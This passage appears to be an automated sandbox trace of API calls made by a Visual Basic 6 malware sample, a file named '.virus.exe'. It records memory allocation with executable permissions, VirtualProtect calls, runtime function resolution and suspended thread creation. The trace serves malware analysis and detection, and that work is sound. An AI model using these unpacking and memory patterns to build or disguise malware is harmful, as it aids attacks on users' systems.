RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0081.913] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0081.914] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0081.914] GetLastError () returned 0x12 [0081.914] SetLastError (dwErrCode=0x12) [0081.914] GetLastError () returned 0x12 [0081.914] SetLastError (dwErrCode=0x12) [0081.914] GetLastError () returned 0x12 [0081.914] SetLastError (dwErrCode=0x12) [0081.914] VirtualAlloc (lpAddress=0x3324000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0081.969] VirtualFree (lpAddress=0x3324000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0081.970] VirtualAlloc (lpAddress=0x3324000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0081.971] VirtualFree (lpAddress=0x3324000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0081.973] GetLastError () returned 0x12 [0081.973] SetLastError (dwErrCode=0x12) [0082.024] GetLastError () returned 0x12 [0082.025] SetLastError (dwErrCode=0x12) [0082.025] GetLastError () returned 0x12 [0082.025] SetLastError (dwErrCode=0x12) [0082.025] VirtualAlloc (lpAddress=0x3324000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0082.028] VirtualFree (lpAddress=0x3324000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0082.030] GetLastError () returned 0x12 [0082.030] SetLastError (dwErrCode=0x12) [0082.078] GetLastError () returned 0x12 [0082.079] SetLastError (dwErrCode=0x12) [0082.079] GetLastError () returned 0x12 [0082.079] SetLastError (dwErrCode=0x12) [0082.079] GetLastError () returned 0x12 [0082.079] SetLastError (dwErrCode=0x12) [0082.079] GetLastError () returned 0x12 [0082.079] SetLastError (dwErrCode=0x12) [0082.130] GetLastError () returned 0x12 [0082.130] SetLastError (dwErrCode=0x12) [0082.130] GetLastError () returned 0x12 [0082.130] SetLastError (dwErrCode=0x12) [0082.130] GetLastError () returned 0x12 [0082.130] SetLastError (dwErrCode=0x12) [0082.187] GetLastError () returned 0x12 [0082.187] SetLastError (dwErrCode=0x12) [0082.187] GetLastError () returned 0x12 [0082.187] SetLastError (dwErrCode=0x12) [0082.237] GetLastError () returned 0x12 [0082.237] SetLastError (dwErrCode=0x12) [0082.237] GetLastError () returned 0x12 [0082.238] SetLastError (dwErrCode=0x12) [0082.238] GetLastError () returned 0x12 [0082.238] SetLastError (dwErrCode=0x12) [0082.287] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.287] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.288] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.288] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.288] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.288] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.289] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.289] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.289] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.290] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.290] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.290] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.290] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.291] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.291] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.291] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0082.292] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0082.292] GetLastError () returned 0x0 [0082.292] SetLastError (dwErrCode=0x0) [0082.292] GetLastError () returned 0x0 [0082.292] SetLastError (dwErrCode=0x0) [0082.292] GetLastError () returned 0x0 [0082.292] SetLastError (dwErrCode=0x0) [0082.343] VirtualAlloc (lpAddress=0x3324000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0082.411] VirtualFree (lpAddress=0x332c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0082.412] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="MSVBVM60.DLL", cbMultiByte=12, lpWideCharStr=0x28edd0, cchWideChar=2047 | out: lpWideCharStr="MSVBVM60.DLL䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆ꜱã(䘨睝Ꞽã(V") returned 12 [0082.412] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="MSVBVM60.DLL", cchWideChar=12, lpMultiByteStr=0x28edd0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSVBVM60.DLL6", lpUsedDefaultChar=0x0) returned 12 [0082.413] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarSub" | out: DestinationString="__vbaVarSub") [0082.413] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarSub", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a477ea) returned 0x0 [0082.414] RtlInitString (in: DestinationString=0x28fda8, SourceString="_CIcos" | out: DestinationString="_CIcos") [0082.414] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_CIcos", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a39386) returned 0x0 [0082.414] VirtualAlloc (lpAddress=0x3314000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3314000 [0082.470] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fptan" | out: DestinationString="_adj_fptan") [0082.470] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fptan", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a309f9) returned 0x0 [0082.471] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarMove" | out: DestinationString="__vbaVarMove") [0082.471] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46aee) returned 0x0 [0082.472] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVar" | out: DestinationString="__vbaFreeVar") [0082.472] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46831) returned 0x0 [0082.472] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaLenBstr" | out: DestinationString="__vbaLenBstr") [0082.473] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaLenBstr", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a9b) returned 0x0 [0082.473] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrVarMove" | out: DestinationString="__vbaStrVarMove") [0082.473] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a21929) returned 0x0 [0082.474] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaPut3" | out: DestinationString="__vbaPut3") [0082.474] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaPut3", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a256fa) returned 0x0 [0082.475] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVarList" | out: DestinationString="__vbaFreeVarList") [0082.475] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVarList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a47262) returned 0x0 [0082.476] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaEnd" | out: DestinationString="__vbaEnd") [0082.476] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaEnd", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0be88) returned 0x0 [0082.477] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m64" | out: DestinationString="_adj_fdiv_m64") [0082.477] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m64", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a302ba) returned 0x0 [0082.478] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaNextEachVar" | out: DestinationString="__vbaNextEachVar") [0082.478] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaNextEachVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a463bc) returned 0x0 [0082.480] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeObjList" | out: DestinationString="__vbaFreeObjList") [0082.480] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeObjList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19fc3) returned 0x0 [0082.480] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x204, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a270b7) returned 0x0 [0082.481] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fprem1" | out: DestinationString="_adj_fprem1") [0082.481] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fprem1", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30941) returned 0x0 [0082.482] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrCat" | out: DestinationString="__vbaStrCat") [0082.482] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrCat", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a76) returned 0x0 [0082.483] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarCmpNe" | out: DestinationString="__vbaVarCmpNe") [0082.483] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarCmpNe", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a49957) returned 0x0 [0082.483] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaSetSystemError" | out: DestinationString="__vbaSetSystemError") [0082.484] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaSetSystemError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0c33a) returned 0x0 [0082.484] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaHresultCheckObj" | out: DestinationString="__vbaHresultCheckObj") [0082.484] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaHresultCheckObj", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a274) returned 0x0 [0082.485] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m32" | out: DestinationString="_adj_fdiv_m32") [0082.485] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m32", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a3026e) returned 0x0 [0082.486] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarForInit" | out: DestinationString="__vbaVarForInit") [0082.486] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarForInit", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a493cc) returned 0x0 [0082.486] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x252, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1cd3a) returned 0x0 [0082.487] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaOnError" | out: DestinationString="__vbaOnError") [0082.487] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaOnError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a2499d) returned 0x0 [0082.488] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSet" | out: DestinationString="__vbaObjSet") [0082.488] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSet", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19ff1) returned 0x0 [0082.488] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m16i" | out: DestinationString="_adj_fdiv_m16i") [0082.489] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30306) returned 0x0 [0082.547] GetLastError () returned 0x0 [0082.547] SetLastError (dwErrCode=0x0) [0082.547] GetLastError () returned 0x0 [0082.547] SetLastError (dwErrCode=0x0) [0082.548] GetLastError () returned 0x0 [0082.548] SetLastError (dwErrCode=0x0) [0082.548] GetLastError () returned 0x0 [0082.548] SetLastError (dwErrCode=0x0) [0082.548] GetLastError () returned 0x0 [0082.549] SetLastError (dwErrCode=0x0) [0082.606] GetLastError () returned 0x0 [0082.607] SetLastError (dwErrCode=0x0) [0082.607] GetLastError () returned 0x0 [0082.607] SetLastError (dwErrCode=0x0) [0082.607] GetLastError () returned 0x0 [0082.607] SetLastError (dwErrCode=0x0) [0082.607] GetLastError () returned 0x0 [0082.607] SetLastError (dwErrCode=0x0) [0082.658] GetLastError () returned 0x0 [0082.658] SetLastError (dwErrCode=0x0) [0082.658] GetLastError () returned 0x0 [0082.659] SetLastError (dwErrCode=0x0) [0082.659] GetLastError () returned 0x0 [0082.659] SetLastError (dwErrCode=0x0) [0082.659] GetLastError () returned 0x0 [0082.659] SetLastError (dwErrCode=0x0) [0082.659] GetLastError () returned 0x0 [0082.659] SetLastError (dwErrCode=0x0) [0082.708] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x28fe68 | out: lpflOldProtect=0x28fe68*=0x2) returned 1 [0082.708] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x28fe6c | out: lpflOldProtect=0x28fe6c*=0x4) returned 1 [0082.708] GetLastError () returned 0x0 [0082.708] SetLastError (dwErrCode=0x0) [0082.708] GetLastError () returned 0x0 [0082.708] SetLastError (dwErrCode=0x0) [0082.709] GetLastError () returned 0x0 [0082.709] SetLastError (dwErrCode=0x0) [0082.758] GetLastError () returned 0x0 [0082.758] SetLastError (dwErrCode=0x0) [0082.758] GetLastError () returned 0x0 [0082.760] SetLastError (dwErrCode=0x0) [0082.760] GetLastError () returned 0x0 [0082.760] SetLastError (dwErrCode=0x0) [0082.808] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4310c4, lpParameter=0x3321c84, dwCreationFlags=0x4, lpThreadId=0x3321c38 | out: lpThreadId=0x3321c38*=0xf60) returned 0x124 [0082.809] GetLocalTime (in: lpSystemTime=0x28fe44 | out: lpSystemTime=0x28fe44*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x8, wMilliseconds=0x2f8)) [0082.809] ResumeThread (hThread=0x124) returned 0x1 [0082.809] SetTimer (hWnd=0x0, nIDEvent=0x1, uElapse=0x132f, lpTimerFunc=0x53a7d8) returned 0x7fd2 [0082.809] GetLastError () returned 0x0 [0082.810] SetLastError (dwErrCode=0x0) [0082.810] GetLastError () returned 0x0 [0082.810] SetLastError (dwErrCode=0x0) [0082.810] GetLastError () returned 0x0 [0082.810] SetLastError (dwErrCode=0x0) [0082.810] GetLastError () returned 0x0 [0082.810] SetLastError (dwErrCode=0x0) [0082.861] GetLastError () returned 0x0 [0082.861] SetLastError (dwErrCode=0x0) [0082.861] GetLastError () returned 0x0 [0082.861] SetLastError (dwErrCode=0x0) [0082.861] GetLastError () returned 0x0 [0082.861] SetLastError (dwErrCode=0x0) [0082.861] GetLastError () returned 0x0 [0082.861] SetLastError (dwErrCode=0x0) [0082.862] GetLastError () returned 0x0 [0082.862] SetLastError (dwErrCode=0x0) [0082.862] GetLastError () returned 0x0 [0082.862] SetLastError (dwErrCode=0x0) [0082.911] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x26000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0082.911] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0082.911] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0082.911] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.962] GetLastError () returned 0x0 [0082.962] SetLastError (dwErrCode=0x0) [0082.962] GetLastError () returned 0x0 [0082.962] SetLastError (dwErrCode=0x0) [0082.962] GetLastError () returned 0x0 [0082.962] SetLastError (dwErrCode=0x0) [0083.015] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x26000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0083.015] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0083.015] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0083.015] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0083.015] GetLastError () returned 0x0 [0083.015] SetLastError (dwErrCode=0x0) [0083.015] GetLastError () returned 0x0 [0083.015] SetLastError (dwErrCode=0x0) [0083.015] GetLastError () returned 0x0 [0083.015] SetLastError (dwErrCode=0x0) [0083.015] GetLastError () returned 0x0 [0083.016] SetLastError (dwErrCode=0x0) [0083.072] GetLastError () returned 0x0 [0083.072] SetLastError (dwErrCode=0x0) [0083.072] GetLastError () returned 0x0 [0083.072] SetLastError (dwErrCode=0x0) [0083.072] GetLastError () returned 0x0 [0083.072] SetLastError (dwErrCode=0x0) [0083.120] GetLastError () returned 0x0 [0083.120] SetLastError (dwErrCode=0x0) [0083.120] GetLastError () returned 0x0 [0083.120] SetLastError (dwErrCode=0x0) [0083.120] GetLastError () returned 0x0 [0083.121] SetLastError (dwErrCode=0x0) [0083.169] GetLastError () returned 0x0 [0083.169] SetLastError (dwErrCode=0x0) [0083.233] GetStartupInfoA (in: lpStartupInfo=0x28feb8 | out: lpStartupInfo=0x28feb8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0083.233] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x104) returned 0x30f07d0 [0083.233] GetCurrentThreadId () returned 0xf38 [0083.233] GetCurrentThreadId () returned 0xf38 [0083.233] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xec8) returned 0x30f08e0 [0083.291] lstrlenA (lpString="") returned 0 [0083.291] lstrcpyA (in: lpString1=0x28fe44, lpString2="" | out: lpString1="") returned="" [0083.291] SetErrorMode (uMode=0x8001) returned 0x0 [0083.291] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28fb00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0083.291] GetUserDefaultLCID () returned 0x409 [0083.291] lstrcpyA (in: lpString1=0x28f800, lpString2="*" | out: lpString1="*") returned="*" [0083.291] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x28fc04, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0083.292] GetSystemDefaultLCID () returned 0x409 [0083.292] GetUserDefaultLCID () returned 0x409 [0083.292] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x28fc0e, cchData=2 | out: lpLCData=".") returned 2 [0083.292] GetStockObject (i=13) returned 0x18a002e [0083.292] GetObjectA (in: h=0x18a002e, c=60, pv=0x28fbd4 | out: pv=0x28fbd4) returned 60 [0083.292] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fbd0, cchData=4 | out: lpLCData="ENU") returned 4 [0083.292] lstrcpyA (in: lpString1=0x28fc00, lpString2="EN" | out: lpString1="EN") returned="EN" [0083.292] lstrlenA (lpString="{xx}") returned 4 [0083.292] lstrlenA (lpString="VB98.CHM") returned 8 [0083.292] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0083.292] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fbd0, cchData=4 | out: lpLCData="ENU") returned 4 [0083.292] lstrcpyA (in: lpString1=0x28fc00, lpString2="EN" | out: lpString1="EN") returned="EN" [0083.292] lstrlenA (lpString="{xx}") returned 4 [0083.293] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0083.293] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0083.293] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28fd28, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0083.293] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28fc24, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0083.293] lstrcpynA (in: lpString1=0x28fb08, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0083.293] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0083.293] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x21) returned 0x30f17b0 [0083.293] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x21) returned 0x30f17e0 [0083.293] lstrcpyA (in: lpString1=0x30f17b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0083.293] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchSrc=-1, lpDestStr=0x28fae8, cchDest=260 | out: lpDestStr="C:\\USERS\\KEECFMWGJ\\DESKTOP\\2A29D10EC3310613657D8A0DCAA4AABE.VIRUS.EXE") returned 70 [0083.298] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x28fbec, dwRevision=0x1 | out: pSecurityDescriptor=0x28fbec) returned 1 [0083.298] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x28fbec, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x28fbec) returned 1 [0083.298] CreateSemaphoreA (lpSemaphoreAttributes=0x28fc00, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?KEECFMWGJ?DESKTOP?2A29D10EC3310613657D8A0DCAA4AABE.VIRUS.EXE") returned 0x11c [0083.374] GetLastError () returned 0x0 [0083.374] GetVersionExA (in: lpVersionInformation=0x28fb64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28fb64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0083.374] OleInitialize (pvReserved=0x0) returned 0x0 [0083.381] OaBuildVersion () returned 0x321396 [0083.433] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="OLEAUT32.DLL", cbMultiByte=12, lpWideCharStr=0x28eb8c, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.DLL") returned 12 [0083.433] SysReAllocStringLen (in: pbstr=0x28fb90*=0x0, psz="OLEAUT32.DLL", len=0xc | out: pbstr=0x28fb90*="OLEAUT32.DLL") returned 1 [0083.433] CharLowerBuffW (in: lpsz="OLEAUT32.DLL", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0083.433] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x775d0000 [0083.434] GetLastError () returned 0x0 [0083.434] SetLastError (dwErrCode=0x0) [0083.434] GetLastError () returned 0x0 [0083.434] GetProcAddress (hModule=0x775d0000, lpProcName="OleLoadPictureEx") returned 0x776370a1 [0083.434] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc079 [0083.434] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b4 [0083.435] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x28fbcc | out: 